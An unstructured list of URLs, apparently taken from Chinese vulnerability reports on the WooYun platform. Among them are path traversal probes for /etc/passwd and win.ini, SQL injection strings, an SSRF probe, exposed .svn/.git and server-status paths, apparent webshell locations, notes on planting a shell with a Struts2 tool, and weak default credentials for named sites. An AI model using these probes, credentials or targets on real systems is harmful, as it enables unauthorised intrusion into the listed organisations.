http://**.**.**.**/dzsw/viewOrder.ashx?order_id=20150916000002 http://**.**.**.**/dzsw/viewOrder.ashx?order_id=20150916000003 http://www.airkunming.com/user/toForgetPass.html https://**.**.** http://s43.xyfm.niu.xunlei.com/login/coopLogin.do http://**.**.**.** http://jiaoyi.choumei.cn/Login/index.html http://**.**.**.**/CallBoard/CallboardInfo.aspx?id=17 http://**.**.**.**/articleComment.jsp?articleid=69012 https://www.hzjr.com/ https://www.hzjr.com:443/ www.hzjr.com http://community.arm.com/message/31052#31052 http://**.**.**.**/grgjjcx.asp http://www.spider.com.cn/myaccountsafe.html?pagetype=resetpaypassword index.php/house/ajax_top_search_data/?s=0.704752029851079 https://github.com/s3cu1n4/mycode/blob/master/temp/test.txt http://www.allyes.com/case/getinfo?id=11 
http://www.firstworldsec.com.hk/FirstWorldSec_aspx/IpoExpress/viewIpoInsight.aspx?LNLId=2267&LangId=2 http://www.firstworldsec.com.hk/FirstWorldSec_aspx/News/viewInfocastNews.aspx?NwsId=2562317&LangId=2 site:url http://www.spider.com.cn/myinfo.html http://**.**.**.**/operation/testip.aspx?id=xxxx&reobj=2# http://**.**.**.**/operation/testip.aspx?id=14030532&reobj=2# http://**.**.**.**/operation/testip.aspx?id=123456&reobj=2# http://**.**.**.**/account/InstallList.aspx?type=3&acc_num=WD0072014080120140831 http://**.**.**.**/account/InstallList.aspx?type=3&acc_num=WD0072014080120140831 http://**.**.**.**/ http://**.**.**.**/pages/jbts/index.shtml http://**.**.**.**/list.aspx?funid=21 http://s/SelectList.aspx?type=1&title=‘ http://**.**.**.**/list.aspx?funid=21 http://**.**.**.**/Login.aspx http://www.cqm.com.cn/cqm/nabudenglu/index.html http://bbs.g.qq.com/forum/queryPageCommentInfo?forum_id=56602&page_no=1&page_size=10&topic_id=2417117197550016&author_id=0&rank_way=5 inurl:my_login.do http://www.doctorjob.com.cn/ http://www.buildjob.net/ http://119.254.70.114/phpmyadmin http://zabbix.ppweb.com.cn/zabbix/ http://**.**.**.**:81/GZPORT/aptitudeQueryAction.do?page=1&method=gridShip http://**.**.**.**/portal/jsp/portal/boatplan/list.jsp?planId=OS1KG0ABEQVFPDLKSAOXV1FZ5XJ1GW1I http://admin.1jiajie.com/v2/index.php?action=login&do=getUserInfo http://**.**.**.**/example/upfile.htm http://**.**.**.**/console/ http://**.**.**.**/ma/ma1.jsp http://**.**.**.**/ma/out.jsp http://**.**.**.**/login/Login.jsp?logintype=1 http://**.**.**.**/model_item.html?action=list&table=Article&classid=4 http://**.**.**/piw/               国家安全生产监督管理总局某站点_ http://**.**.**/piw/     国家安全生产监督管理总局某站点_ http://**.**.**/          国家安全生产监督管理总局某站点_ http://www.cet.zjut.edu.cn/IndexAction.do http://mail.cdzq.com/webmailgo.php系统 http://khgl.cdzq.com http://khgl.cdzq.com/business!openSearchDetail.action?uid=193299 http://www.xuanhao.com/help/help.php?flbm=0907 http://**.**.**.**/ad.php?adid=1515 
http://**.**.**.**/ad.php?adid=1515%20AND%20 http://**.**.**.**/find-password/via-mobile?uid=4 http://**.**.**.**/find-password/via-email?uid=4 http://**.**.**.**/user/order/cancel-order?id=119053 http://x.mobage.cn/public/images/55f990d0adf8c.php http://x.mobage.cn/public/images/55f990d0adf8c.php http://**.**.**.**/expOnline/topic/show_q.jsp?topicid=20 http://**.**.**.**/ http://**.**.**.** http://**.**.**.**/Website/xjlist.jsp?ColumnCode=m0301 http://**.**.**.**/Website/advisoryshow.jsp?id=30948 http://**.**.**.**/uddiexplorer/SearchPublicRegistries.jsp?operator=**.**.**.**:9001&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://**.**.**.**/EnterpriseList.aspx http://k3shop.k3cloud.kingdee.com/ http://k3shop.k3cloud.kingdee.com/admin/打开后台地址吓到我了,竟然直接跳转登陆。抓了下密码 http://k3shop.k3cloud.kingdee.com/admin/Marketing/upload.aspx?tempFolder=aspx http://k3shop.k3cloud.kingdee.com/upload/activity/aspx/22.aspx http://www.fali2015.com/ http://www.fali2015.com/phpmyadmin/ http://www.salala.com.cn/cakesearch.php?ptype=FO&cake=67 http://**.**.**.**/quotation/common/tb/UINotify3502.jsp?ProposalNo=905012015000001005824 http://**.**.**.**/quotation/common/pg/UIEndorsePtextShow.jsp?BizNo=70507201535060100006301 http://**.**.**.**/quotation/CommonViewTrace.do?BusinessNo=70501201535060100584401 http://**.**.**.**/quotation/CommonViewTrace.do?BusinessNo=70501201535060100584401* http://**.**.**.**/quotation/common/pg/UIEndorsePtextShow.jsp?BizNo=70507201535060100006301* http://**.**.**.**/quotation/common/tb/UINotify3502.jsp?ProposalNo=905012015000001005824* http://**.**.**.**/console/login.jsp?cs=2 http://life.renren.com/show/ http://page.renren.com/602123308/admin http://page.renren.com/admininvite/send2Email http://www.imooc.com/view/422 http://www.intime.com.cn:8000/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini http://mos.wxchina.com/ ip:211.147.239.62 in:file http://106.38.180.57:8080/.svn/entries 
http://106.39.244.203/.git/index http://agent.talk99.cn/admin/login.jsp http://**.**.**.**/ http://**.**.**.**/quotation/0501/tbcbpg/UIPrPoEn0501ClaimShowInfo.jsp?claimno=505012014350101004501 http://**.**.**.**/quotation/0501/tbcbpg/UIPrPoEn0501Show.jsp?BIZTYPE=POLICY&BizNo=805012015350101000262&SHOWTYPE=SHOW&RiskCode=0501&SysCode=prpall user:admin http://account.pcjoy.cn/ http://www.dfsyqc.com/syfw/Notice/new_detail.asp?id=1061 http://duia.com/ http://106.39.118.131/ http://106.39.118.131/aaa.jpg http://**.**.**.**/Admin/Public/login.html user:admin pass:admin http://**.**.**.**/xzspjs.aspx?dep=ggzf http://**.**.**.**/guzhulianmeng/lianmeng.asp?us http://nc.zto.cn/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://122.195.190.234/fybx/newLoginEmp.action http://**.**.**.**:8080/ http://**.**.**.**:8080/ http://**.**.**.**:8080/ http://**.**.**.**:8080/ http://**.**.**.**:8080/ http://cjcx.czu.edu.cn/cjcxjg.asp http://**.**.**.**/weixin/index.php?r=userBind/bindUserInfo&refferUrl=%2Fweixin%2Findex.php%3Fr%3Daviation%2Forder http://mail.ch.com/ http://**.**.**.**:8080/pages/dept/dept_list.jsp?userId=1 http://**.**.**.**/ http://king.sanguosha.com/signup/sfzcom.php http://www.jstnjt.com/ http://www.jstnjt.com/manager/Admin/Login.asp http://www.gomesell.com/ http://mail.china-sss.com:3000/ http://baidu.acmcoder.com/cand/login http://etc.cmu.edu.cn/ylx/lianxi_x.asp?zid=1 http://mail.tfzq.com/ http://**.**.**.**/commodity/kd/ http://fund.pingan.com/uddiexplorer/SetupUDDIExplorer.jsp http://one.pingan.com/uddiexplorer/SetupUDDIExplorer.jsp http://114.251.20.5:8080/seeyon/index.jsp com:8080 http://oa.crpcg.com:8080 cn:8085 http://**.**.**/pg/newpage/login.aspx http://211.151.3.11 http://**.**.**.**/cn/plugin.php?id=hwdownload&mod=detail&mid=144 http://**.**.**.**/DBWechat/weixin/network.do http://**.**.**.**/DBWechat/weixin/network.do 
http://www.iliangcang.com/i/goods/?act=checkGoodsAmount&attr_keys=-1 http://sh.niu.com/ http://vm.qichelive.com/default.aspx http://vm.qichelive.com/pics.aspx user:admin http://oa.yurun.com/tools/SWFUpload/upload.jsp height:20px;BORDER http://oa.yurun.com/null023.jsp,如下图: https://www.xzbao.com/index.php?user&q=action/reg&type=clear http://**.**.**.**:85/ http://**.**.**.**/ http://**.**.**.**/login/Login.jsp?logintype=1&gopage=&message=17 http://**.**.**.**//weaver/weaver.email.FileDownloadLocation?fileid=10 http://**.**.**.**//weaver/weaver.email.FileDownloadLocation?fileid=41&download=1 jdbc:oracle:thin:@**.**.**.**:1521:CUSPCWDB1 http://**.**.**.**/Login.aspx登录地址 https://eip.fubon.com.cn/ https://eip.fubon.com.cn/Login.aspx http://**.**.**.**//admin/login/checklogin jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@**.**.**.**:1521:orcl http://www.crclogic.com http://www.crclogic.com/admin/ http://www.dfsyqc.com/syfw/simplenew.asp https://vpn.cctv.net.cn/ http://hrt.cctv.net.cn/tms/打开一看action,直接上struts2利用工具写上马儿 http://172.16.0.30/Ams/ jdbc:oracle:thin:@**.**.**.**:1521:center http://**.**.**.** http://**.**.**.**/webadmin或者是 http://**.**.**.** http://**.**.**.** http://www.starnetuc.com/ http://www.starnetuc.com/wp-admin/ http://baom.jinri.cn/Product/productdetail.aspx?ProductId=41 http://dc.jinri.net.cn/RequestListenerService.aspx http://{0}/LoadBalancing.ashx?SectionName={1 http://114.80.69.231:15888/SpecialSearch.ashx http://114.80.69.233/Alipay_DJP_Notify.aspx http://114.80.69.233/Alipay_DJP_Refund.aspx http://114.80.69.233:81/KqResult.aspx http://staff.uestc.edu.cn/staff.zip http://**.**.**.**:85/ http://**.**.**.**/ www.dfsyqc.com http://**.**.**.**/InfoPage/ShowAnno.aspx?AnnoID=7871&UrlType=1 http://**.**.**.**/InfoPage/ShowAnno.aspx?AnnoID=4101&UrlType=1&SiteItem=43 http://**.**.**.**/InfoPage/ShowAnno.aspx?AnnoID=344&UrlType=1 http://**.**.**.**/InfoPage/ShowAnno.aspx?AnnoID=7087&UrlType=1 
http://**.**.**.**/InfoPage/QZLXInfoList.aspx?SiteItem=20 http://**.**.**.**/InfoPage/QZLXInfoList.aspx?SiteItem=20 http://**.**.**.**/InfoPage/QZLXInfoList.aspx?SiteItem=20 http://**.**.**.**/InfoPage/QZLXInfoList.aspx?SiteItem=20 http://**.**.**.**/InfoPage/Form_OnlineExchange.aspx?SitemID=156 http://**.**.**.**/InfoPage/Form_OnlineExchange.aspx?SitemID=156 http://**.**.**.**/InfoPage/Form_OnlineExchange.aspx?SitemID=156 http://**.**.**.**/InfoPage/Form_OnlineExchange.aspx?SitemID=156 http://**.**.**.**/InfoPage/Form_Margin.aspx?SiteItem=157 http://**.**.**.**/InfoPage/Form_Margin.aspx?SiteItem=157 http://**.**.**.**/InfoPage/Form_Margin.aspx?SiteItem=157 http://**.**.**.**/InfoPage/InfoPage/Form_Margin.aspx?SiteItem=157 http://oa.998.com/ http://oa.998.com/messager/users.data svnserve://180.153.191.52:3690 http://admin.cloud.360.cn/ http://api.cloud.360.cn http://**.**.**.**/search.asp?KeyWord= http://life.pingan.com/uddiexplorer/SetupUDDIExplorer.jsp http://bank.pingan.com/uddiexplorer/SetupUDDIExplorer.jsp http://www.wooyun.org/bugs/wooyun-2015-0141883/trace/b28f7a43e2caba0204ea484620804388 http://super.tgbus.com http://**.**.**.**:89/ URl:http://**.**.**.**/www/index.do http://**.**.**.**//www/noticelist.do http://**.**.**.**/bugs/wooyun-2010-0129038 http://**.**.**.**/news.php https://www.xzbao.com http://jue.so/RetrievePassword.php http://jue.so/RetrievePassword.php?Type=3 http://**.**.**.**/bm_zwxx_info.aspx?bid=133321&zwid=12223&cflag=zgsc URL:http://**.**.**.**/ http://**.**.**.**/ http://subject.ourgame.com/2009/FactionInfo/Query.aspx http://202.101.244.46:86/Modules/EnrollManagement/Matriculate/EnrollMatriculateQuery.aspx txbKsh:111 http://www.evideo-smart.com/ http://www.evideo-smart.com/admin/login.aspx http://**.**.**.**/Operation/testip.aspx?id=13456056&reobj=2 http://**.**.**.**/account/Installshow.aspx?id=12177265 http://**.**.**.**/account/maintenanceshow.aspx?id=5668544 
http://**.**.**.**/commodity/servicio/nostandardserv/realNameRegister/viewUploadImage.jsps?fielPath=/../../../../../../../../../../../etc/passwd&t=1442562485506 http://**.**.**.**/Account/SearchUserInfo http://**.**.**.**/Account/SearchUserInfo http://**.**.**.**/Account/SearchUserInfo http://**.**.**.**/Account/SearchUserInfo http://**.**.**.**/Account/SearchUserInfo coding:utf-8 http://admin.spider.com.cn/spider2/admin/login_manager.jsp?oid=login http://**.**.**.**/dealers/trainmanage/PrintPreview.aspx?planId=20150465250011&applyId=2015042482 http://**.**.**.**/librarian/news/view-news.asp?ID=93 http://**.**.**.**/xwyd/news/js.asp?classid=6&nclassid=12 http://excsoft.mychery.com/CherySIS/ywxx_json/ywxxNotReadNumAction.action http://112.126.78.148/index.php?r=site/login http://mail.zzvcom.com/ http://**.**.**.**/center/login/LoginRegisterLogic.htm?m=query&f=customerLogin libo:libo弱口令登入 http://116.6.66.143/applymain.aspx http://**.**.**.**/bugs/wooyun-2015-0101950 http://**.**.**.**/etan2010/ http://**.**.**.**/etan2010/works_data_list.php?class_id=24 http://**.**.**.**/site_item_list_1.php?site_map_item_id=25 http://**.**.**.**/site_item_list_2.php?site_map_item_id=54 http://**.**.**.**/site_item_list_3.php?site_map_item_id=108 http://**.**.**.**/site_item_list_5.php?site_map_item_id=103 http://**.**.**.**/site_item_list_6.php?site_map_item_id=98 http://**.**.**.**/site_item_list_7.php?site_map_item_id=25 http://**.**.**.**/site_item_content_1.php?site_map_item_id=5 http://**.**.**.**/site_item_content_2.php?site_map_item_id=104 http://**.**.**.**/site_item_content_3.php?site_map_item_id=510 http://**.**.**.**/site_item_content_5.php?site_map_item_id=110 http://**.**.**.**/site_item_content_6.php?site_map_item_id=99 http://**.**.**.**/site_item_content_7.php?site_map_item_id=5 http://**.**.**.**/e_paper/epaper_list.php?class_id=2 http://**.**.**.**/e_paper/epaper.php?main_id=49 http://**.**.**.**/activity/mem_login.php?event_id=352 
http://**.**.**.**/activity/event_reg_list.php?event_id=351 http://**.**.**.**/activity/event_news_list.php?event_id=264 http://**.**.**.**/activity/event_news_detail.php?event_id=352 http://**.**.**.**/event_photo_list.php?event_id=352 http://**.**.**.**/event_photo_view.php?event_photo_pic=1 http://**.**.**.**/website/credit/credit_enterprise_detail.jsp?id=2031 http://**.**.**.**/website/market/market_build_detail.jsp?record_id=710%27%20and%20%271%27=%271 http://**.**.**.**/website/human_rs/module/enterprise_detail.jsp?enterprise_id=13047%27%20and%20%271%27=%271 http://**.**.**.** http://**.**.**.**/ http://**.**.**.**/user/edituseraddress.aspx?aid=82810 index.php/Login/index.html http://**.**.**.**/zwpt/cppic22.asp?id=1 http://**.**.**.**/zwpt/shownews.asp?id=6203&xxfl=10 http://**.**.**.**/zwpt/xxgd.asp?xxfl=10 http://211.151.3.11/lms/index.php?s=Index/Index/login http://**.**.**.**/ http://**.**.**.**/xml/ http://**.**.**.**/upload/upimg/ http://**.**.**.**/include/ http://**.**.**.**/download/ http://**.**.**.**/data/ http://**.**.**.**/ http://**.**.**.**/homepage/LoginHomepage.jsp?hpid=1&opt=privew http://101.227.253.90:8080/ http://**.**.**.**/bugs/wooyun-2010-0129269前辈链接 http://**.**.**.**/xw_view.asp?id=237 http://**.**.**.**/index.php?controller=szck&action=show&id=7&type=bszn http://182.92.225.109:9999/management/ PASSWORD:123456 http://dist.21cn.com:8088/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://dist.21cn.com:8088/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://10.29.5.24 URL:http://fenxiao.lvmama.com/ http://**.**.**.**:8081/appfront/user/findPasswordValidate.action http://**.**.**.**:8081/appfront/user/regValidate.action http://**.**.**.**:8081/appfront/user/regValidate.action http://data.1jiajie.com/user.html URL:http://**.**.**.**:9080/sys/main.action http://nb.**.**.**.**:10040 http://**.**.**.**:81/admin/user/user_info.jsp http://nb.**.**.**.**:10040/bugfree http://nb.**.**.**.**:10000/ 
http://svn.**.**.**.**/svn/ http://iwatchome.tom.com/News_QA.php?seqno=4&RadioGroup1=Zenith%20El%20Primero http://iwatchome.tom.com/WatchView_QA.php?seqno=4&RadioGroup1=Zenith%20El%20Primero http://iwatchome.tom.com/News_QA.php?seqno=4&RadioGroup1=Zenith%20El%20Primero http://pan.baidu.com/s/1bnseDiv http://**.**.**.**/schoolAction!to_view.action?entity.id=4a4b50bb4fd3e64a014fdfd972ae004d http://**.**.**.**/userAction!to_subSystem.action?subSystem=resourceSystem http://fenxiao.lvmama.com/reg.jsp http://fenxiao.lvmama.com http://cme.cdwsw.91huayi.com/ http://www.91huayi.com/ http://cqwsw.91huayi.com/Page/InfoView.aspx?lm=ZCXX&id=116* http://cqwsw.91huayi.com/SysAdmin/login.aspx http://cqwsw.91huayi.com/FilePool/AttachFile/config.aspx http://cqwsw.91huayi.com/FilePool/x.aspx http://new.citsbj.com/member/findpwd http://yjs.nwu.edu.cn/eyschool/xcbd_content.php?id=1 http://yjs.nwu.edu.cn/eyschool/hf.php?id1=73 http://geology.nwu.edu.cn:81/jxyd/models/cn/deans/view.asp http://zs.jxau.edu.cn/showpic.php?id=1 http://fenxiao.lvmama.com http://**.**.**.**/content.asp?id=7652 http://**.**.**.**/content.asp?id=7652-1 http://tg.zhengjin99.com:80/ http://103.255.93.13/server-status http://103.255.93.9/server-status http://103.255.93.10/server-status http://card.suning.com/server-status http://mp.suning.com/server-status http://103.255.93.15/server-status http://103.255.93.16/server-status http://103.255.93.17/server-status http://103.255.93.117/server-status http://103.255.93.111/server-status http://103.255.93.119/server-status http://103.255.93.103/.bashrc http://www.wooyun.org/bug.php?action=view&id=5896 http://**.**.**.**/payment/ http://**.**.**.**/cmxlogin.php http://**.**.**.**/news/index.jsp中国电信股份有限公司北京研究院 http://**.**.**.**:8080/login.html http://wspx.91huayi.com/secure/login.aspx URL:http://**.**.**.**:80/news_list.php?page=1&tid=1'%22 http://**.**.**.**/phpinfo.php http://office.mingyi.com.cn/txl/manage/login.aspx https://vpn.bcia.com.cn/ 
http://10.40.2.63/Page/Main/index.php http://www.wabuw.com/search-line/?keyword=大连 http://report.changyou.com/tessar/,如图所示: http://report.changyou.com/tessar/.svn/entries,如图所示: http://report.changyou.com/tessar/html_tessar_tconfig/StartAnalyze.html http://report.changyou.com/tessar/html_tessar_tconfig/HardInfoSerial.html如图所示: http://report.changyou.com/tessar/html_tessar_tconfig/tConfigMap.html,如图所示: http://report.changyou.com/tessar/html_tessar_crash/CrashAnalyze.html,如图所示: POST:http://hyuser.91huayi.com/ashx/getUserInfo.ashx http://**.**.**.**:10000/console/login/LoginForm.jsp http://**.**.**.**:10000/test/da.jsp http://**.**.**.**:10000/reduh/1.jsp http://**.**.**.**:10000/reduh/1.jsp http://auto.ynet.com/cgi/newslist.php?dir=101 http://auto.ynet.com/cgi/news.php?id=532927 http://auto.ynet.com/cgi/subbrand.php?subid=44 http://auto.ynet.com/cgi/configuration.php?subid=44 http://m.hongkongairlines.com/ index.php/state/analysisnew http://**.**.**.**/Gjj_Serach/Gjj_login.asp http://newoa.glsc.com.cn:8082/names.nsf?Login http://lib.nwnu.edu.cn/librarian/news/manage.asp http://**.**.**.**/index.asp http://**.**.**.**:8080/ http://**.**.**.**:8080/secure/Signup!default.jspa http://**.**.**.**/ http://**.**.**.**:8080/MyJsp.jsp http://www.ticket2010.com/zhuanti_vote.aspx?subId=61 http://www.ticket2010.com/ZhuanTi.ashx?Function=Toupiao&subid=61&pollid= http://**.**.**.**/personReg.do?param=643e4fd1a2b4eaaf http://**.**.**.**/changePassword.do?key=1be43bd9d6e4ce9c-2188324cca3173e9469ea19382000f6e http://**.**.**.**/personReg.do?param=643e4fd1a2b4eaaf http://**.**.**.**/changePassword.do?key=643e4fd1a2b4eaaf-2188324cca3173e9469ea19382000f6e http://mantis.social-touch.com/view_all_bug_page.php http://**.**.**.**/index.htm http://**.**.**.**/homepage/LoginHomepage.jsp?hpid=7&isfromportal=1&templateId=5&null&templateId=5&null http://mp.wxfenxiao.com/Order/lists/city_id/110100 http://hi.mop.com/space/452514055# http://hi.mop.com/sns/add-follow 
http://www.ljabc.com.cn/classroom/classroom.html www.ljabc.com.cn http://119.254.102.120:8080/111.php http://**.**.**.**/wssb/wssb/shenbao/xmsbWebList.do?action=webList&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&pjAbc1=42&websitId=100&netTypeId=2&participate=no&comment=no http://**.**.**.**/wssb/wssb/dc/orgWebList.do?action=searchOrgList&websitId=100&netTypeId=2&corporateType=1 http://**.**.**.**/wssb/wssb/shenbao/xmsbIframeList.do?action=webList&pageSize=6&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&pjAbc1=42&websitId=100&netTypeId=2&participate=no&comment=no http://**.**.**.**/wssb/wssb/shenbao/xmsbIframeList.do?action=webList&pageSize=6&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&pjAbc1=42&websitId=100&netTypeId=2&participate=no&comment=no http://**.**.**.**/wssb/wssb/shenbao/xmsbWebList.do?action=webList&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&pjAbc1=42&websitId=100&netTypeId=2&participate=no&comment=no http://**.**.**.**/wssb/wssb/shenbao/xmsbWebList.do?action=webList&pjAbc1=42&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&fbNo=&websitId=100&netTypeId=2&&participate=no&comment=no http://**.**.**.**/wssb/wssb/shenbao/searchConsult.do?typeStatus=1&isanswer=2&wayType=1&title= http://**.**.**.**/wssb/wssb/shenbao/searchConsult.do?typeStatus=1&isanswer=2&wayType=1&title= http://**.**.**.**/wssb/wssb/shenbao/xmsbWebList.do?action=webList&pjAbc1=42&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&fbNo=&websitId=100&netTypeId=2&&participate=no&comment=no http://**.**.**.**/wssb/wssb/shenbao/xmsbWebList.do?dictionid=8601&action=webList&pjAbc1=42&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&fbNo=&websitId=100&netTypeId=2&participate=yes&comment=no 
http://**.**.**.**/wssb/wssb/shenbao/xmsbWebList.do?dictionid=8601&action=webList&pjAbc1=42&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&fbNo=&websitId=100&netTypeId=2&participate=yes&comment=no http://**.**.**.**/wssb/wssb/dc/orgWebList.do?action=searchOrgList&status=2&websitId=100&corporateType=1&netTypeId=2&order=foundDate®istrationDeptCode= http://**.**.**.**/wssb/wssb/shenbao/xmsbWebList.do?dictionid=8601&action=webList&pjAbc1=42&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&fbNo=&websitId=100&netTypeId=2&participate=yes&comment=no http://**.**.**.**/wssb/wssb/dc/orgWebList.do?action=searchOrgList&status=2&websitId=100&corporateType=1&netTypeId=2&order=foundDate®istrationDeptCode= http://**.**.**.**/wssb/wssb/shenbao/xmsbIframeList.do?action=webList&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&pjAbc1=42&pageSize=6&shenhe=2&shenheLevel=2&websitId=100&netTypeId=2&participate=no&comment=no http://**.**.**.**/wssb/wssb/shenbao/msZuixinfabu.do?action=iframeList&type=2&pjAbc1=42&websitId=100&netTypeId=2&t= http://**.**.**.**/wssb/wssb/shenbao/xmsbWebList.do?action=webList&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&fbNo=&pjAbc1=42&websitId=100&netTypeId=2&participate=no&comment=no&t= http://**.**.**.**/wssb/wssb/shenbao/msXmsbIframeList2.do?action=iframeList&pageSize=5&type=1&pjAbc1=42&websitId=100&netTypeId=2&t= http://**.**.**.**/wssb/wssb/shenbao/xmsbIframeList.do?action=webList&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&pjAbc1=42&pageSize=6&shenhe=2&shenheLevel=2&websitId=100&netTypeId=2&participate=no&comment=no http://**.**.**.**/wssb/wssb/shenbao/msXmsbIframeListC2.do?action=webList&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&pjAbc1=42&websitId=100&netTypeId=2&participate=no&comment=yes http://**.**.**.**/wssb/wssb/njxxgb/publishedView.do?action=publishedView&id=1000038958&catalogpara=N01&application=mjzz&instanceid=N0114022642066 
http://**.**.**.**/wssb/wssb/shenbao/msXmsbIframeListC.do?action=webList&pageSize=6&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&pjAbc1=42&websitId=100&netTypeId=2&participate=no&comment=yes http://**.**.**.**/wssb/wssb/shenbao/xmsbWebList.do?action=webList&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&fbNo=&pjAbc1=42&websitId=100&netTypeId=2&participate=yes&comment=no http://**.**.**.**/wssb/wssb/shenbao/searchConsult.do?typeStatus=1&isanswer=2&wayType=1&title= http://**.**.**.**/wssb/wssb/shenbao/searchConsult.do?typeStatus=1&isanswer=2&wayType=1&title= http://**.**.**.**/wssb/wssb/shenbao/xmsbWebList.do?action=webList&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&fbNo=&pjAbc1=42&websitId=100&netTypeId=2&participate=yes&comment=no http://**.**.**.**/wssb/wssb/shenbao/msXmsbIframeListP.do?action=webList&pageSize=6&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&pjAbc1=42&websitId=100&netTypeId=2&participate=yes&comment=no http://**.**.**.**/wssb/wssb/shenbao/msXmsbIframeListP.do?action=webList&pageSize=6&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&pjAbc1=42&websitId=100&netTypeId=2&participate=yes&comment=no http://**.**.**.**/wssb/wssb/shenbao/msXmsbIframeList2.do?action=iframeList&pageSize=5&type=1&pjAbc1=42&websitId=100&netTypeId=2 http://**.**.**.**/wssb/wssb/shenbao/xmsbQueryList.do?action=xmsbQueryList&shenhe=2&pjAbc1=42&websitId=100&netTypeId=2&ssfs=&fwly= http://**.**.**.**/wssb/wssb/shenbao/xmsbQueryList.do?action=xmsbQueryList&shenhe=2&pjAbc1=42&websitId=100&netTypeId=2&ssfs=&fwly=&hdfs=&xmmc=&hddy= http://**.**.**.**/wssb/wssb/shenbao/xmsbQueryList.do?action=xmsbQueryList&shenhe=2&pjAbc1=42&websitId=100&netTypeId=2&ssfs=&fwly=&hdfs= 
http://**.**.**.**/wssb/wssb/shenbao/xmfbList.do?action=webList&shenhe=2&shenheLevel=2&ssfs=&zzlb=&zzmc=&fbNo=&fwly=&hdfs=&xmmc=&hddy=&fbNo=&pjAbc1=42&netTypeId=2&from=gongwang&participate=yes&comment=no http://**.**.**.**/wssb/wssb/shenbao/xmsbQueryList.do?action=xmsbQueryList&shenhe=2&pjAbc1=42&websitId=100&netTypeId=2&ssfs=&fwly= http://**.**.**.**/bugs/wooyun-2010-082150 http://**.**.**.**/st/qianfei/st_qianfei_index_a.aspx www.ljabc.com.cn http://220.178.0.94/tk/ http://220.178.0.94/tk/manage/login.aspx http://220.178.0.94/tk/upload/201509199859.aspx http://tripshow.com:80/ http://**.**.**.**/ http://www.51piao.com/Member/PointProductList.aspx?PointProductTypeId=22&Name= http://www.51piao.com/Member/PointProductList.aspx?PointInfo=1000,8000 http://**.**.**.**/members/union/searchSchoolAction.do?action=doNewSearchSchools&type=3&areaId=&keyword= http://**.**.**.**/members/info/job/postAction.do?action=doPostSearch http://**.**.**.**:8080/servlet/view?qid=1 http://**.**.**.**:8080/servlet/edit?qid=1 http://**.**.**.**:8080/servlet/kbview?qid=1 http://**.**.**.**:8080/servlet/kbedit?qid=1 http://**.**.**.**:8080/servlet/kbdelquestion?qid=0 http://**.**.**.**:8080/servlet/keywordEditServlet?kid=1 http://**.**.**.**:8080/servlet/keywordDelServlet?kid=0 http://**.**.**.**/adv_search/all_search.jsp?keywords= http://**.**.**.**/list.jsp?info_type=sm http://comment.10jqka.com.cn/api/stock/index.php?module=concept&code=882030&name= http://**.**.**.**/modul/webcon!findTypeLi.action?type=8&num=200 https://github.com/crazycoody/msg-hub/blob/a9dc08c28577380b9f0b702c87737fadf932a12c/msg-plugin-service/src/test/java/cn/homecredit/msg/plugin/internal/DefaultHttpHelperIT.java http://**.**.**.**/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://**.**.**.**/jobseeker/stage/FAQ_Question.aspx?class=1 http://**.**.**.**/jobseeker/stage/FAQ_Question.aspx?class=1 
